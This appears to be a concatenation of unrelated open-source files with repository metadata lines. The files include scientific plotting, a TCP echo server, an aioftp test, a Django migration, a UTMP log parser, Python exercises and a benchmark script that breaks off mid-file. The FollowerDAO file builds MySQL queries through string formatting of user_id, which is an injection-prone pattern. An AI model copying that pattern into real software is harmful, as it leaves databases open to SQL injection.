bound = experiment_medium[rea][i]
if bound <= 0:
model.reactions.get_by_id(rea).bounds = (bound, 0)
elif bound >= 0:
model.reactions.get_by_id(rea).bounds = (0, bound)
sol = model.optimize()
predict_result.append(round(sol.objective_value, 3))
print('Experiment Biomass:', experiment_result)
print('iHL622 Biomass:', predict_result)
# %% <vitmin B12 > NOTE: error
# experiment_medium = {
# 'BIOMASS': predict_result,
# 'EX_glc__D_e': [-20, -20, -20, -20, -20, ],
# 'EX_glyc_e': [0.00, -5.00, -5.00, -10.00, -10.],
# 'EX_fru_e': [0.00, -1.00, -5.00, -1.00, -5.], }
#
# predict_result_b12 = []
# for i in range(0, len(experiment_result)):
# model = iHL622.copy()
# rea = cobra.Reaction('EX_adeadocbl_c')
# model.add_reaction(rea)
# model.reactions.get_by_id('EX_adeadocbl_c').reaction = 'adeadocbl_c --> '
# model.objective = 'EX_adeadocbl_c'
# # model.reactions.get_by_id('EX_ade_e').bounds = (0,0)
# for rea in experiment_medium.keys():
# bound = experiment_medium[rea][i]
# if rea == 'BIOMASS':
# model.reactions.get_by_id(rea).bounds = (bound, bound)
#
# elif bound <= 0:
# model.reactions.get_by_id(rea).bounds = (bound, 0)
# elif bound >= 0:
# model.reactions.get_by_id(rea).bounds = (0, bound)
# predict_result_b12.append(
# round(model.optimize().objective_value * 1355.365, 3)) # Cobalamin: Molar mass: 1,355.365 g/mol
# print('iHL622 b12:', predict_result_b12)
# %% <draw>
import brewer2mpl
fig, ax = plt.subplots(figsize=(6, 4))
ax2 = ax.twinx()
bmap = brewer2mpl.get_map('Set2', 'qualitative', 7)
colors = bmap.mpl_colors
# plt.ylim((0.0, 1.0))
x = np.arange(0, 5)
width = 0.25 # the width of the bars
rects2 = ax.bar(x + width / 2, predict_result, width, label='Model Growth rate', color=colors[0]) # ,
rects1 = ax2.bar(x - width / 2, experiment_result, width, yerr=experiment_result_err, label='Experiment OD600',
color=colors[1]) #
rects1_ = ax2.bar(0, 0, label='Model Growth rate', color=colors[0], )
# Add some text for labels, title and custom x-axis tick labels, etc.
ax2.set_ylabel("OD600", fontsize=16)
ax.set_ylabel('Growth rate (mmol/gDW/h)', fontsize=16) # color = 'tab:blue'
# ax.tick_params(axis='y') # , labelcolor='tab:blue'
ax2.set_ylim((0, 3.2))
ax.set_ylim((0, 2.2))
ax.set_title('Growth rate simulation', fontsize=18)
labels = [''] + experiment_group
ax2.set_xticklabels(labels, fontsize=16)
ax2.legend(loc='best', fontsize=11)
# ax2.legend(loc='best', fontsize=14)
fig.tight_layout()
plt.show()
fig.savefig('Growth rate simulation case2_1.png')
| 2.109375 | 2 |
src/pyTCP/server.py | nimpsch/pyTCP | 0 | 12772898 | import select
import socketserver
import threading
from queue import Queue
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
"""A threaded tcp request handler
"""
def handle(self):
""" The handle function.
Reads data from the client as long as the server is not requested to close.
Sends the read data back to the client and stores it in a queue.
"""
while self.server.instance.keep_alive:
ready_read, ready_write, exceptional = select.select([self.request], [], [], 1)
for sock in ready_read:
if sock == self.request:
recv_msg = sock.recv(self.server.instance.receive_bytes)
if recv_msg is not None:
self.request.sendall(recv_msg)
self.server.instance._add(recv_msg)
class EchoServer:
socketserver.TCPServer.allow_reuse_address = True
"""A threaded tcp server
Attributes
----------
ip : str
The ip address of the tcp server.
port : int
The port of the tcp server.
bytes_to_receive : int, default 4096
Reads the number bytes from the socket. Returns fewer bytes than bytes_to_receive if fewer are available.
"""
def __init__(self, ip, port, receive_bytes=4096):
self.server = ThreadedTCPServer((ip, port), ThreadedTCPRequestHandler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server.socket.setblocking(False)
self.server.instance = self
self.keep_alive = False
self.receive_bytes = receive_bytes
self._last_received = Queue(maxsize=1)
@property
def last_received(self):
"""bytes: Returns the last received message."""
return self._last_received.get()
def start_server(self):
""" Starts the tcp server.
"""
self.keep_alive = True
self.server_thread.start()
def stop_server(self):
""" Stops the tcp server.
"""
self.keep_alive = False
self.server.shutdown()
self.server.server_close()
def _add(self, message):
if not self._last_received.full():
self._last_received.put(message)
else:
self._last_received.get_nowait()
self._last_received.put(message)
| 3.40625 | 3 |
BITs/2014/Budashov_A_E/task_3_8.py | YukkaSarasti/pythonintask | 0 | 12772899 | #Задача N3. Вариант 8
#Напишите программу, которая выводит имя "<NAME>", и
#запрашивает его псевдоним. Программа должна сцеплять две эти строки и
#выводить полученную строку, разделяя имя и псевдоним с помощью тире.
#<NAME>
#03.03.2016
print("Герой нашей сегодняшней программы-<NAME>")
psev=input("Под каким же псевдонимом он известен? Ваш ответ:")
if(psev)==("<NAME>"):
print("Все верно <NAME> -" + psev)
else:
print("Вы ошиблись, это не его псевдоним(")
input ("Press Enter to close")
| 3.953125 | 4 |
dao/FollowerDAO.py | iosTeamofFour/iAimeServer | 0 | 12772900 | <gh_stars>0
import traceback
import pymysql
from dao.DatabaseConfig import *
from pojo.Follower import Follower
class FollowerDAO:
__db_host = host
__db_admin = admin
__db_password = password
__db = database
__port = port
__charset = charset
def retrieve(self, user_id):
retrieve_followers = []
sql = 'select follower_id from follow where user_id = %s' % user_id
connection = pymysql.connect(host=self.__db_host, user=self.__db_admin, password=self.__db_password,
database=self.__db, port=self.__port, charset=self.__charset)
cursor = connection.cursor()
try:
cursor.execute(sql)
result = cursor.fetchall()
if result is not None:
for index in range(len(result)):
follower_result = result[index]
follower = Follower()
follower.set_follower_id(follower_result[0])
sql = 'select avatar, nick_name from information where user_id = %s' % follower.get_follower_id()
cursor.execute(sql)
sub_result = cursor.fetchone()
follower.set_avatar(sub_result[0])
follower.set_name(sub_result[1])
retrieve_followers.append(follower)
except:
traceback.print_exc()
finally:
connection.close()
cursor.close()
return retrieve_followers
# 获取完整followers
# def get(self, followers):
# connection = pymysql.connect(self.__db_host, self.__db_admin, self.__db_password, self.__db, charset='utf8')
# cursor = connection.cursor()
# results = []
#
# try:
# for index in range(len(followers)):
# sql = 'select * from user where user_id = %s' % (followers[index].get_follower_id())
# cursor.execute(sql)
# retrieve_user = cursor.fetchone()
# result = {
# "NickName": retrieve_user[3],
# "UserID": retrieve_user[0],
# "Avatar": retrieve_user[4],
# }
# results.append(result)
# return results
# except:
# traceback.print_exc()
# finally:
# connection.close()
# cursor.close()
# follower_dao = FollowerDAO()
# print(follower_dao.retrieve(1)) | 2.421875 | 2 |
stackless/threadscheduling.py | irr/python-labs | 4 | 12772901 | <filename>stackless/threadscheduling.py
#
# A demonstration of how each thread has its own scheduler.
#
# Author: <NAME> <<EMAIL>>
#
# This code was written to serve as an example of Stackless Python usage.
# Feel free to email me with any questions, comments, or suggestions for
# improvement.
#
# FURTHER DETAIL:
#
# This example starts some tasklets on the main thread, and starts a second
# thread as well, starting some tasklets on that. You should be able to
# see that the scheduler on each thread is unrelated to the one on the
# other, which is why I need to start a ManageSleepingTasklets for each of
# them.
#
# POSSIBLE PROBLEMS:
#
# If Stackless complains that "run() must be run from the main thread's
# main tasklet", then you need to get a later version of Stackless.
# This constraint was removed.
#
import threading
import stackless
import time
_locals = threading.local()
global running
running = True
# Altered boilerplate Sleep function.
def Sleep(secondsToWait):
channel = stackless.channel()
endTime = time.time() + secondsToWait
_locals.sleepingTasklets.append((endTime, channel))
_locals.sleepingTasklets.sort()
# Block until we get sent an awakening notification.
channel.receive()
def ManageSleepingTasklets(threadID):
global running
_locals.sleepingTasklets = []
while running:
if len(_locals.sleepingTasklets):
endTime = _locals.sleepingTasklets[0][0]
if endTime <= time.time():
channel = _locals.sleepingTasklets[0][1]
del _locals.sleepingTasklets[0]
# We have to send something, but it doesn't matter what as it is not used.
channel.send(None)
elif stackless.getruncount() == 1:
# Give up if there are no more sleeping tasklets. Otherwise the two
# threads keep on running endlessly.
break
stackless.schedule()
# ...
def looping_tasklet(threadID, taskletID):
n = 3
while n > 0:
n -= 1
print threadID, "looping_tasklet", taskletID, "loop", n
Sleep(1.0)
print threadID, "looping_tasklet", taskletID, "exit"
def a_main_tasklet():
threadID = 2
stackless.tasklet(ManageSleepingTasklets)(threadID)
stackless.tasklet(looping_tasklet)(threadID, 1)
print threadID, "runcount.1", stackless.getruncount()
stackless.run()
if __name__ == "__main__":
threadID = 1
stackless.tasklet(ManageSleepingTasklets)(threadID)
stackless.tasklet(looping_tasklet)(threadID, 1)
stackless.tasklet(looping_tasklet)(threadID, 2)
print threadID, "runcount", stackless.getruncount()
thread = threading.Thread(target=a_main_tasklet)
thread.start()
try:
stackless.run()
except:
running = False
raise
| 3.28125 | 3 |
bvspca/core/migrations/0017_auto_20171229_1052.py | rds0751/bvspca | 10 | 12772902 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2017-12-29 17:52
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('core', '0016_auto_20171212_1107'),
]
operations = [
migrations.AlterField(
model_name='adoptioncentre',
name='body',
field=wagtail.core.fields.StreamField((('picture_links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(max_length=50)), ('image', wagtail.images.blocks.ImageChooserBlock()), ('page', wagtail.core.blocks.PageChooserBlock()))), template='core/blocks/picture_links.html')),), blank=True),
),
migrations.AlterField(
model_name='teampage',
name='group1_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group2_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group3_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
),
]
| 1.609375 | 2 |
lib/bindings/samples/server/debug/profiling_output.py | tlalexander/stitchEm | 182 | 12772903 | import threading
import errors
import vs
import logging
import gc
from blinker import signal
from utils import performance
from output.output import Output
# We need to be able to load (not run) vs_server on windows to generate the documentation.
# So we're skipping non-windows imports
try:
import psutil
except ImportError:
pass
PROFILING_STITCH_FORMAT = vs.NV12
class ProfilingOutput(Output):
"""Profiling output
"""
def __init__(self, stitcher, name="profiling", critical=False, preserved=False):
super(ProfilingOutput, self).__init__(stitcher, name, critical, preserved)
self.writer = None
self.pid = psutil.Process()
def reset(self):
self._transition_check()
self.pid.cpu_percent(interval=None)
vs.Output_reset(self.writer.object())
def _start(self, profiling_time=0, preserve=False):
# Todo I don't like that it's created differently from other outputs here, but for now I left it like this
panorama = self.stitcher.project_manager.panorama
self.writer = vs.Output_profiling(self.name,
panorama.width,
panorama.height,
self.stitcher.project_manager.controller.getFrameRateFromInputController(),
PROFILING_STITCH_FORMAT)
if self.writer is None:
raise errors.InternalError()
self.shared_writer = vs.writerSharedPtr(self.writer.object())
self.shared_video = vs.videoWriterSharedPtr(self.shared_writer)
self.has_audio = False
if self.shared_video is not None and not self.stitcher.stitch_output.addWriter(self.shared_video):
raise errors.InternalError("Cannot add profiling writer to stitcher")
if profiling_time > 0:
threading.Timer(profiling_time, self.t_stop).start()
self.pid.cpu_percent(interval=None)
#jump automatically from starting state to started state
self.t_writer_ok()
def _stop(self):
self.fps = vs.Output_getFps(self.writer.release())
self.writer = None
logging.info("fps is %f:" % self.fps)
logging.info("cpu_util is %d" % self.pid.cpu_percent(interval=None))
cuda = performance.getCudaInfo()
logging.info("gpu_util is %d" % int(cuda['utilization.gpu']))
logging.info("enc_util is %s" % cuda['utilization.enc'])
success = self.stitcher.stitch_output.removeWriterNoGIL(self.name)
signal("profiling_stopping").send()
if not success:
raise errors.InternalError("Cannot remove writer")
self.shared_video = None
self.shared_writer = None
gc.collect()
#jump automatically from stopping state to stopped state
self.t_writer_completed()
def get_statistics(self):
cuda = performance.getCudaInfo()
self._transition_check()
if self.writer is not None:
self.fps = vs.Output_getFps(self.writer.object())
return {"fps": self.fps,
"cpu": self.pid.cpu_percent(interval=None),
"gpu": float(cuda['utilization.gpu']),
"enc": float(cuda['utilization.enc'])}
| 2.15625 | 2 |
examples/nonlinear_reg.py | xxao/miniml | 0 | 12772904 | import miniml
import numpy as np
# Adapted from:
# https://lucidar.me/en/neural-networks/curve-fitting-nonlinear-regression/
# init data
np.random.seed(3)
X = np.linspace(-10, 10, num=1000)
Y = 0.1*X*np.cos(X) + 0.1*np.random.normal(size=1000)
X = X.reshape((len(X), 1))
Y = Y.reshape((len(Y), 1))
# create model
model = miniml.Model()
model.dense(1, None, 'plain')
model.dense(64, 'relu', 'he')
model.dense(32, 'relu', 'he')
model.dense(1, None, 'plain')
# init params
rate = 0.01
epochs = 1000
# train model
optimizer = miniml.Adam(
cost = 'mse',
epochs = epochs,
init_seed = 48,
store = 10,
verbose = 200)
costs = optimizer.train(model, X, Y, rate)
# plot results
miniml.plot_costs(epochs, costs=costs)
miniml.plot_regression(model, X, Y)
| 3.296875 | 3 |
tests/test-permissions.py | maurice0918/aioftp | 0 | 12772905 | from common import * # noqa
@aioftp_setup(
server_args=([(aioftp.User(
base_path="tests/foo",
home_path="/",
permissions=[aioftp.Permission(writable=False)],
),)], {}))
@with_connection
@expect_codes_in_exception("550")
async def test_permission_denied(loop, client, server):
await client.login()
await client.make_directory("bar")
await client.quit()
@aioftp_setup(
server_args=([(aioftp.User(
base_path="tests/foo",
home_path="/",
permissions=[
aioftp.Permission("/", writable=False),
aioftp.Permission("/bar"),
aioftp.Permission("/foo"),
],
),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_permission_overriden(loop, client, server, *, tmp_dir):
await client.login()
await client.make_directory("bar")
await client.remove_directory("bar")
await client.quit()
| 2.015625 | 2 |
Lib/GenericWebpageParser.py | rtroper0/deep-learning-data-repo | 0 | 12772906 |
# Library imports
from bs4 import BeautifulSoup
import requests
# Generic web parser providing basic functionality to load a webpage
# Use this as a base class for more specific webpage parsers
class WebpageParser:
# WebpageParser version
version = '0.1'
# Used to request web page
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'}
def __init__(self, url = None):
# Store current URL
self.current_url = url
# Store full page content
self.pageContent = None
self.pageLoaded = False
# Load page if URL provided
if not (url == None):
# setUrl also calls loadCurrentPage
self.setUrl(url)
def getVersion(self):
return self.version
# Set URL and attempt to load page
# Return the return value of 'loadCurrentPage()
def setUrl(self, url):
self.current_url = url
self.pageContent = None
self.pageLoaded = False
return self.loadCurrentPage()
def getUrl(self):
# Check if URL has not been specified yet
if self.current_url == None:
print("Note: A valid URL has not been specified!")
return ""
# Return URL
else:
return self.current_url
# Attempt to load current page; Return True if successful
def loadCurrentPage(self):
# Check if a URL has been specified
if self.current_url == None:
print("Error: Cannot retrieve current page! A URL has not been specified!")
self.pageLoaded = False
return self.pageLoaded
# Check if page for current URL has already been loaded
elif self.pageLoaded:
print("Note: Page has already been loaded for current URL.")
# Assume that page for current URL has not been loaded
else:
# Try to load page
try:
req = requests.get(self.current_url, headers=self.headers)
self.pageContent = BeautifulSoup(req.content, "lxml")
self.pageLoaded = True
except:
print("Warning: Could not load page: %s" % self.current_url)
self.pageContent = None
self.pageLoaded = False
# Return Boolean indicating success or failuer
return self.pageLoaded
# Get text from the html section specified by tag and attributes
# tag is a string and attributes is a dictionary of attribute/value pairs
def getTextFromSection(self, tag, attributes):
text = ""
# Return if URL has not been specified
if self.current_url == None:
print("Warning: Cannot get text from specified html, because URL has not been specified!")
return text
# If this point is reached, URL has been specified
html = self.pageContent.find(tag, attributes)
if not (html == None):
text = html.text
else:
print("Warning: Cannot get text from specified html! Returning empty string.")
text = ""
return text
| 3.328125 | 3 |
plaso/parsers/utmp.py | CNR-ITTIG/plasodfaxp | 1 | 12772907 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Parser for Linux UTMP files."""
import construct
import logging
import os
import socket
from plaso.events import time_events
from plaso.lib import errors
from plaso.lib import eventdata
from plaso.parsers import interface
from plaso.parsers import manager
__author__ = '<NAME> (<EMAIL>)'
class UtmpEvent(time_events.PosixTimeEvent):
"""Convenience class for an UTMP event."""
DATA_TYPE = u'linux:utmp:event'
def __init__(
self, posix_time, microsecond, user, computer_name,
terminal, status, ip_address, structure):
"""Initializes the event object.
Args:
posix_time: the POSIX time value, which contains the number of seconds
since January 1, 1970 00:00:00 UTC.
microsecond: number of micro seconds.
user: active user name.
computer_name: name of the computer.
terminal: type of terminal.
status: login status.
ip_address: ip_address from the connection is done.
structure: entry structure parsed.
exit: integer that represents the exit status.
pid: integer with the process ID.
terminal_id: integer with the Inittab ID.
"""
super(UtmpEvent, self).__init__(
posix_time, eventdata.EventTimestamp.START_TIME,
micro_seconds=microsecond)
self.computer_name = computer_name
self.exit = structure.exit
self.ip_address = ip_address
self.pid = structure.pid
self.status = status
self.terminal_id = structure.terminal_id
self.terminal = terminal
self.user = user
class UtmpParser(interface.FileObjectParser):
"""Parser for Linux/Unix UTMP files."""
_INITIAL_FILE_OFFSET = None
NAME = u'utmp'
DESCRIPTION = u'Parser for Linux/Unix UTMP files.'
LINUX_UTMP_ENTRY = construct.Struct(
u'utmp_linux',
construct.ULInt32(u'type'),
construct.ULInt32(u'pid'),
construct.String(u'terminal', 32),
construct.ULInt32(u'terminal_id'),
construct.String(u'username', 32),
construct.String(u'hostname', 256),
construct.ULInt16(u'termination'),
construct.ULInt16(u'exit'),
construct.ULInt32(u'session'),
construct.ULInt32(u'timestamp'),
construct.ULInt32(u'microsecond'),
construct.ULInt32(u'address_a'),
construct.ULInt32(u'address_b'),
construct.ULInt32(u'address_c'),
construct.ULInt32(u'address_d'),
construct.Padding(20))
LINUX_UTMP_ENTRY_SIZE = LINUX_UTMP_ENTRY.sizeof()
STATUS_TYPE = {
0: u'EMPTY',
1: u'RUN_LVL',
2: u'BOOT_TIME',
3: u'NEW_TIME',
4: u'OLD_TIME',
5: u'INIT_PROCESS',
6: u'LOGIN_PROCESS',
7: u'USER_PROCESS',
8: u'DEAD_PROCESS',
9: u'ACCOUNTING'}
# Set a default test value for few fields, this is supposed to be a text
# that is highly unlikely to be seen in a terminal field, or a username field.
# It is important that this value does show up in such fields, but otherwise
# it can be a free flowing text field.
_DEFAULT_TEST_VALUE = u'Ekki Fraedilegur Moguleiki, thetta er bull ! = + _<>'
def ParseFileObject(self, parser_mediator, file_object, **kwargs):
"""Parses an UTMP file-like object.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
file_object: The file-like object to extract data from.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
file_object.seek(0, os.SEEK_SET)
try:
structure = self.LINUX_UTMP_ENTRY.parse_stream(file_object)
except (IOError, construct.FieldError) as exception:
raise errors.UnableToParseFile(
u'Unable to parse UTMP Header with error: {0:s}'.format(exception))
if structure.type not in self.STATUS_TYPE:
raise errors.UnableToParseFile((
u'Not an UTMP file, unknown type '
u'[{0:d}].').format(structure.type))
if not self._VerifyTextField(structure.terminal):
raise errors.UnableToParseFile(
u'Not an UTMP file, unknown terminal.')
if not self._VerifyTextField(structure.username):
raise errors.UnableToParseFile(
u'Not an UTMP file, unknown username.')
if not self._VerifyTextField(structure.hostname):
raise errors.UnableToParseFile(
u'Not an UTMP file, unknown hostname.')
# Check few values.
terminal = self._GetTextFromNullTerminatedString(
structure.terminal, self._DEFAULT_TEST_VALUE)
if terminal == self._DEFAULT_TEST_VALUE:
raise errors.UnableToParseFile(
u'Not an UTMP file, no terminal set.')
username = self._GetTextFromNullTerminatedString(
structure.username, self._DEFAULT_TEST_VALUE)
if username == self._DEFAULT_TEST_VALUE:
raise errors.UnableToParseFile(
u'Not an UTMP file, no username set.')
if not structure.timestamp:
raise errors.UnableToParseFile(
u'Not an UTMP file, no timestamp set in the first record.')
file_object.seek(0, os.SEEK_SET)
event_object = self._ReadUtmpEvent(file_object)
while event_object:
event_object.offset = file_object.tell()
parser_mediator.ProduceEvent(event_object)
event_object = self._ReadUtmpEvent(file_object)
def _VerifyTextField(self, text):
"""Check if a byte stream is a null terminated string.
Args:
event_object: text field from the structure.
Return:
True if it is a null terminated string, False otherwise.
"""
_, _, null_chars = text.partition(b'\x00')
if not null_chars:
return False
return len(null_chars) == null_chars.count(b'\x00')
def _ReadUtmpEvent(self, file_object):
"""Returns an UtmpEvent from a single UTMP entry.
Args:
file_object: a file-like object that points to an UTMP file.
Returns:
An event object constructed from a single UTMP record or None if we
have reached the end of the file (or EOF).
"""
offset = file_object.tell()
data = file_object.read(self.LINUX_UTMP_ENTRY_SIZE)
if not data or len(data) != self.LINUX_UTMP_ENTRY_SIZE:
return
try:
entry = self.LINUX_UTMP_ENTRY.parse(data)
except (IOError, construct.FieldError):
logging.warning((
u'UTMP entry at 0x{:x} couldn\'t be parsed.').format(offset))
return self._ReadUtmpEvent(file_object)
user = self._GetTextFromNullTerminatedString(entry.username)
terminal = self._GetTextFromNullTerminatedString(entry.terminal)
if terminal == u'~':
terminal = u'system boot'
computer_name = self._GetTextFromNullTerminatedString(entry.hostname)
if computer_name == u'N/A' or computer_name == u':0':
computer_name = u'localhost'
status = self.STATUS_TYPE.get(entry.type, u'N/A')
if not entry.address_b:
try:
ip_address = socket.inet_ntoa(
construct.ULInt32(u'int').build(entry.address_a))
if ip_address == u'0.0.0.0':
ip_address = u'localhost'
except (IOError, construct.FieldError, socket.error):
ip_address = u'N/A'
else:
ip_address = u'{0:d}.{1:d}.{2:d}.{3:d}'.format(
entry.address_a, entry.address_b, entry.address_c, entry.address_d)
return UtmpEvent(
entry.timestamp, entry.microsecond, user, computer_name, terminal,
status, ip_address, entry)
def _GetTextFromNullTerminatedString(
self, null_terminated_string, default_string=u'N/A'):
"""Get a UTF-8 text from a raw null terminated string.
Args:
null_terminated_string: Raw string terminated with null character.
default_string: The default string returned if the parser fails.
Returns:
A decoded UTF-8 string or if unable to decode, the supplied default
string.
"""
text, _, _ = null_terminated_string.partition(b'\x00')
try:
text = text.decode(u'utf-8')
except UnicodeDecodeError:
logging.warning(
u'[UTMP] Decode UTF8 failed, the message string may be cut short.')
text = text.decode(u'utf-8', u'ignore')
if not text:
return default_string
return text
manager.ParsersManager.RegisterParser(UtmpParser)
| 2.578125 | 3 |
算法设计与分析/作业/homework3T2.py | TD21forever/hdu-term-project-helper | 17 | 12772908 | <filename>算法设计与分析/作业/homework3T2.py
# -*- coding: utf-8 -*-
# @Author: TD21forever
# @Date: 2019-05-25 00:18:44
# @Last Modified by: TD21forever
# @Last Modified time: 2019-05-26 11:36:12
'''
保证差距最远的两个磁道的概率最小
'''
def solution(k,alist):
sumRate = sum(alist)
rate = [i/sumRate for i in alist]
rate.sort()
j = 0
k = 0
result = 0
tmp = rate.copy()
for i in range(len(rate)):
if i %2 == 0:
tmp[0+j] = rate[i]
j += 1
else:
tmp[-1-k] = rate[i]
k += 1
for i in range(len(tmp)):
for j in range(i+1,len(tmp)):
result += tmp[i]*tmp[j]*(j-i)
return result
if __name__ == '__main__':
rate = [33, 55, 22, 11, 9]
k = 5
res = solution(k,rate)
print(res) | 3.71875 | 4 |
freezerclient/tests/unit/test_shell.py | memogarcia/python-freezerclient | 18 | 12772909 | # (c) Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
import fixtures
import io
import testtools
from testtools import matchers
from freezerclient import shell as openstack_shell
DEFAULT_USERNAME = 'username'
DEFAULT_PASSWORD = 'password'
DEFAULT_PROJECT_ID = 'tenant_id'
DEFAULT_PROJECT_NAME = 'tenant_name'
DEFAULT_AUTH_URL = 'http://127.0.0.1:5000/v2.0/'
class ShellTest(testtools.TestCase):
FAKE_ENV = {
'OS_USERNAME': DEFAULT_USERNAME,
'OS_PASSWORD': <PASSWORD>,
'OS_PROJECT_ID': DEFAULT_PROJECT_ID,
'OS_PROJECT_NAME': DEFAULT_PROJECT_NAME,
'OS_AUTH_URL': DEFAULT_AUTH_URL,
}
# Patch os.environ to avoid required auth info.
def setUp(self):
super(ShellTest, self).setUp()
for var in self.FAKE_ENV:
self.useFixture(
fixtures.EnvironmentVariable(
var, self.FAKE_ENV[var]))
def shell(self, argstr, check=False, expected_val=0):
# expected_val is the expected return value after executing
# the command in FreezerShell
orig = (sys.stdout, sys.stderr)
clean_env = {}
_old_env, os.environ = os.environ, clean_env.copy()
try:
sys.stdout = io.StringIO()
sys.stderr = io.StringIO()
_shell = openstack_shell.FreezerShell()
_shell.run(argstr.split())
except SystemExit:
exc_type, exc_value, exc_traceback = sys.exc_info()
self.assertEqual(expected_val, exc_value.code)
finally:
stdout = sys.stdout.getvalue()
stderr = sys.stderr.getvalue()
sys.stdout.close()
sys.stderr.close()
sys.stdout, sys.stderr = orig
os.environ = _old_env
return stdout, stderr, _shell.options
def test_help(self):
required = 'usage:'
help_text, stderr, _ = self.shell('help')
self.assertThat(
help_text,
matchers.MatchesRegex(required))
def test_help_on_subcommand(self):
required = [
'.*?^usage: .* job-list']
stdout, stderr, _ = self.shell('help job-list')
for r in required:
self.assertThat(
stdout,
matchers.MatchesRegex(r, re.DOTALL | re.MULTILINE))
def test_help_command(self):
required = 'usage:'
help_text, stderr, _ = self.shell('help action-create')
self.assertThat(
help_text,
matchers.MatchesRegex(required))
def test_run_incomplete_command(self):
cmd = 'job-create'
stdout, stderr, _ = self.shell(cmd, check=True, expected_val=2)
search_str = "run job-create: error"
self.assertTrue(any(search_str in string for string
in stderr.split('\n')))
def test_set_os_backup_api_version(self):
cmd = (
'--os-backup-api-version 1 job-list')
stdout, stderr, options = self.shell(cmd)
self.assertEqual("1", options.os_backup_api_version)
def test_default_os_backup_api_version(self):
cmd = 'help job-list'
stdout, stderr, options = self.shell(cmd)
self.assertEqual("2", options.os_backup_api_version)
def test_set_os_username_password(self):
cmd = (
'--os-username caihui --os-password stack job-list')
stdout, stderr, options = self.shell(cmd)
self.assertEqual("caihui", options.os_username)
self.assertEqual("stack", options.os_password)
def test_set_os_project_name_id(self):
cmd = (
'--os-project-id tecs0000000001 \
--os-project-name tecs job-list')
stdout, stderr, options = self.shell(cmd)
self.assertEqual("tecs0000000001", options.os_project_id)
self.assertEqual("tecs", options.os_project_name)
def test_set_os_auth_url(self):
cmd = (
'--os-auth-url http://127.0.0.1:5001 job-list')
stdout, stderr, options = self.shell(cmd)
self.assertEqual("http://127.0.0.1:5001", options.os_auth_url)
| 1.84375 | 2 |
rekcurd_dashboard/logger/__init__.py | rekcurd/dashboard | 19 | 12772910 | <reponame>rekcurd/dashboard
# -*- coding: utf-8 -*-
from .logger_interface import SystemLoggerInterface
from .logger_jsonlogger import JsonSystemLogger
from .logger_fluent import FluentSystemLogger
logger = JsonSystemLogger()
| 1.070313 | 1 |
tests_perf/main.py | fnrizzi/pressio-demoapps | 2 | 12772911 | #!/usr/bin/env python
import pathlib, sys
file_path = pathlib.Path(__file__).parent.absolute()
from argparse import ArgumentParser
import numpy as np
import time
import pressiodemoapps as pda
def schemeStringToSchemeEnum(s):
if s=="FirstOrder":
return pda.InviscidFluxReconstruction.FirstOrder
elif s=="Weno3":
return pda.InviscidFluxReconstruction.Weno3
elif s=="Weno5":
return pda.InviscidFluxReconstruction.Weno5
# ---------------------------
if __name__ == '__main__':
# ---------------------------
parser = ArgumentParser()
parser.add_argument("-m, --mesh", dest="meshDir", default="empty")
parser.add_argument("-n", dest="loopCount", default=10, type=int)
parser.add_argument("-s", dest="scheme");
args = parser.parse_args()
start = time.time()
meshPath = str(args.meshDir)
meshObj = pda.load_cellcentered_uniform_mesh(meshPath)
schemeEnum = schemeStringToSchemeEnum(args.scheme)
probId = pda.Euler2d.PeriodicSmooth
appObj = pda.create_problem(meshObj, probId, schemeEnum)
yn = appObj.initialCondition()
V = appObj.createVelocity()
B = np.ones((len(yn), 25), order='F')
AJ = appObj.createApplyJacobianResult(B)
# warmup
appObj.applyJacobian(yn, 0., B, AJ)
#appObj.velocity(yn, 0., V)
print("starting loop")
start = time.time()
